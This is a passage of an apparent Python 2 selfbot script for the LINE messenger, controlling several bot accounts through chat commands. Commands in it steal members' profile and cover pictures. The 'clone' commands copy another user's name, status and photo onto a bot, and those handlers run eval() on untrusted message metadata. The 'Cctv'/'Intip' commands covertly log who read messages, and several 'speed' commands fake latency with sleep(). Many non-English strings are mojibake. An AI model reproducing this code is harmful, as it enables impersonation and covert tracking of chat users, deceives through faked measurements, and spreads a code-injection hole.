if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+="[•]Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["Backup"] == True: md+="[•]Backup : on\n"
else:md+="[•]Backup : off\n"
if wait["qr"] == True: md+="[•]AutoBlock QR : on\n"
else:md+="[•]AutoBlock QR : off\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n"
if wait["protectionOn"] == True: md+="[•]Protection : hight\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="[•]Protection : low\n"+ datetime.today().strftime('%H:%M:%S')
"\n*============*\n⭐✰ (☆─┅═ই╬BABANG ADHI)=======*"
cl.sendText(msg.to,md)
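# NOTE: The "Status" report above appends one line per flag in `wait`. A sketch of a
# table-driven builder (hypothetical STATUS_FLAGS mapping; same "[•]... [On/Off]"
# format, easier to keep in sync when a new flag is added):
#
#     STATUS_FLAGS = [("Protectgr", "Protect QR"), ("Protectcancl", "Protect Invite"),
#                     ("contact", "Contact"), ("autoJoin", "Auto Join")]
#     def build_status(wait):
#         lines = ["[•]%s [%s]" % (label, "On" if wait.get(key) else "Off")
#                  for key, label in STATUS_FLAGS]
#         return "⭐Status Protection*============*\n" + "\n".join(lines)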
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的ç���¸å†Œ"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "album removeat’" in msg.text:
gid = msg.text.replace("album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
#---------------------Sc invite owner ke group------
elif "Anu: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Anu: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é �留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["zzz","Bot speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.00009)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Speef" in msg.text:
if msg.from_ in admin:
print("Speed respon")
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "kurangin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Rusakin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.1)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Tambah" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.5)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Spbot" in msg.text:
if msg.from_ in admin:
time.sleep(0.5)
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(2.32)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp asli"]:
if msg.from_ in admin:
print("Sp asli")
start = time.time()
cl.sendText(msg.to, "Sek")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed asli executed"
elif msg.text in ["Speedbot","speedbot"]:
if msg.from_ in admin:
print("Speedbot")
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
ks.sendText(msg.to, "%sseconds" % (elapsed_time))
k1.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
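# NOTE: Most of the "speed" commands above insert an artificial time.sleep() before
# measuring, so they report the sleep duration rather than real latency; only
# "Sp asli"/"Speedbot" time an actual sendText call. A minimal sketch of an honest
# round-trip measurement (hypothetical helper name, same time module used above):
#
#     def measure_send(client, to):
#         start = time.time()
#         client.sendText(to, "ping")   # time one real API call
#         return time.time() - start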
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = k1.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
k1.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
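# NOTE: The six "BotN backup run" handlers above differ only in the client and the
# three output filenames. A sketch of a shared helper (hypothetical names; the
# per-bot filenames stay unchanged and are passed in as arguments):
#
#     def backup_profile(client, mid_, dn_file, sm_file, ps_file):
#         c = client.getContact(mid_)
#         for path, value in ((dn_file, c.displayName),
#                             (sm_file, c.statusMessage),
#                             (ps_file, c.pictureStatus)):
#             with open(path, "w") as f:
#                 f.write(value)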
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = k1.getContact(target)
X = contact.displayName
profile = k1.getProfile()
profile.displayName = X
k1.updateProfile(profile)
k1.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = k1.getProfile()
lol.statusMessage = Y
k1.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
k1.updateProfilePicture(P)
except Exception as e:
k1.sendText(msg.to, "Failed!")
print e
#=================================================
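# NOTE: The "BotN clone " handlers above all copy displayName, statusMessage and
# pictureStatus from the mentioned contact onto one client. A sketch of that shared
# logic (hypothetical helper name, same LINE client methods as used above):
#
#     def clone_profile(client, target_mid):
#         contact = client.getContact(target_mid)
#         profile = client.getProfile()
#         profile.displayName = contact.displayName
#         profile.statusMessage = contact.statusMessage
#         client.updateProfile(profile)
#         client.updateProfilePicture(contact.pictureStatus)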
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = k1.getProfile()
profile.displayName = x
k1.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = k1.getProfile()
cak.statusMessage = y
k1.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
k1.updateProfilePicture(p)
k1.sendText(msg.to, "Succes")
except Exception as e:
k1.sendText(msg.to,"Gagagl!")
print e
#=================================================
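# NOTE: The "BotN backup" handlers above restore a profile from the text files written
# by the matching "BotN backup run" command. A sketch of the shared restore step
# (hypothetical helper name, same file layout as above):
#
#     def restore_profile(client, dn_file, sm_file, ps_file):
#         with open(dn_file) as f: name = f.read()
#         with open(sm_file) as f: status = f.read()
#         with open(ps_file) as f: picture = f.read()
#         profile = client.getProfile()
#         profile.displayName = name
#         profile.statusMessage = status
#         client.updateProfile(profile)
#         client.updateProfilePicture(picture)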
elif msg.text == "Sider":
if msg.from_ in admin:
cl.sendText(msg.to, "CCTV sedang di proses......")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "Ciduk":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||Di Read Oleh||%s\n||By : By babang adhi\n\n>Pelaku CCTV<\n%s-=CCTV=-[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Cctv dulu Oneng")
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Siap di intip....")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] Reset"
elif msg.text == "Intip":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print "[Command] Check"
chiya += rom[1] + "\n"
cl.sendText(msg.to, "✔ ✰ TEAM BONDS KILLS ✰\nRead : %s\n\n✖ Sider :\n%s\nPoint creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] reset"
else:
cl.sendText(msg.to,"Read point tidak tersedia, Silahkan ketik Cctv untuk membuat Read point.")
#-----------------------------------------------
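# NOTE: "Sider"/"Cctv" set a read point (message id + timestamp) for the group, and
# "Ciduk"/"Intip" later report everything collected in wait2['readMember'] and
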